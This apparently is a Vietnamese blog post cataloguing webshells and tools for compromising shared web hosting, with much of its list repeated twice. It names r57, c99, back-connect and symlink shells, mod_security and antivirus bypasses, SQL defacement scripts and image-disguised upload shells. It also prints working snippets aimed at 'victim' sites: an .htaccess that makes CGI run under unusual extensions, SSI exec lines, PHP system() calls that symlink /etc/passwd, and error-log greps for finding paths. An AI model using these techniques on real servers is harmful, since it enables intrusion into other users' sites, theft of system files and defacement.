Shell Cgi (cgi.x-zone) khi gỏ command nó sẽ mã hóa dòng lệnh ,có thể qua mặt vài server
telnet 1.4
bypass mod sec (base64)
Telnet 1.3
.htaccess
Admin Finder (tìm thư mục admin)
cmd.shtml > view source cmd.shtml
cmd.shtml (1.txt là file đã được symljnk) > view source cmd.shtml
Bypass ln.zip
File SymLink.php
Find Path qua error-log : http://victim.com/fuck
Shell offline.php?acc ~> get user admin ,nhiều chức năng ,ko bị lổi trên các server config kỉ
Backuper.php (Leech code)
Shell Unkonw (Brute)
Shell images (r57)
Shell images (Webadmin)
Shell Dumper.php (Zip + Restor data)
Shell images aaa.php.jpg - shell upload
Shell help.php (upload file + chmod)
Unzip.php (giải nén các file bị zip)
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
telnet v1.3 (ko cần htaccess)
sym-pl.pl (symljnk cgi ko cần htaccess)
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
Locus Shell (back connect)
perl shell mr.thien (BackConnect)
Mysqldumper.php (BackConnect)
5.2.9 (BYpass)
dot.pl (tim user+domain)
upload.phpl (upload len path)
shell.xml (prefix admincp)
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php
shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)
hoặc
vault.php (editor,webshell,bind)
saudi.php (symljnk root ,brute,...)
sa2.0.php(resever,symljnk root,upload)
madspotshell.php(symlink tung user)
r57-vip.php symljnk
telnet 1.4
bypass mod sec (base64)
Telnet 1.3
.htaccess
Options +FollowSymLinks +Indexes~> 2 dòng cuối khi symljnk ghi vào file.vkl thì file này load trên trình duyệt sẽ tự download về
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script cgi pl tg love h4 tgb cbg
RewriteEngine on
RewriteRule (.*)\.war$ $1.cgi
## END ##
RemoveHandler .vkl
AddType application/octet-stream .vkl
Admin Finder (tìm thư mục admin)
cmd.shtml > view source cmd.shtml
<!--#exec cmd="dir /home/victim/public_html/" -->
<!--#include virtual='1.txt'-->
hoặc<?php
chmod('ln',0777);
system('./ln -s /etc/passwd > 1.txt');
?>
./ln -s /home/victim/public_html/index.php 1.txt
/home/victim/public_html/index.php
tail -100 /var/log/httpd/domains/siteA.error.log | grep fuck
tail -100 /usr/local/apache/logs/error_log | grep fuck
Backuper.php (Leech code)
Shell Unkonw (Brute)
Shell images (r57)
Shell images (Webadmin)
Shell Dumper.php (Zip + Restor data)
Shell images aaa.php.jpg - shell upload
Shell help.php (upload file + chmod)
Unzip.php (giải nén các file bị zip)
Con shell này tạo ra thêm 2 file để thực hiện zip
Nếu ko tạo đc 2 file này thì chúng ta sẽ tự tạo 2 file đó
telnet v1.3 (ko cần htaccess)
sym-pl.pl (symljnk cgi ko cần htaccess)
Shell Root ( thực thi các dòng lệnh sẽ show ra trình duyệt - chỉ sd 1 số sv)
Locus Shell (back connect)
perl shell mr.thien (BackConnect)
Mysqldumper.php (BackConnect)
5.2.9 (BYpass)
dot.pl (tim user+domain)
upload.phpl (upload len path)
shell.xml (prefix admincp)
shell ,tạo file symljnk đối với từng version php ,direct , h4ckcity.php
sql deface vbb,wp,mybb sql.php
html shell có thể view file bị permiss html.php
shell python.php (chức năng tạo shell cgi,py,bypass,sql wp& jomla,....)
hoặc
python.pyshell sec4ever .qua mặt anti với code hoàn toàn # c99 & r57
vault.php (editor,webshell,bind)
saudi.php (symljnk root ,brute,...)
sa2.0.php(resever,symljnk root,upload)
madspotshell.php(symlink tung user)
r57-vip.php symljnk
Không có nhận xét nào:
Đăng nhận xét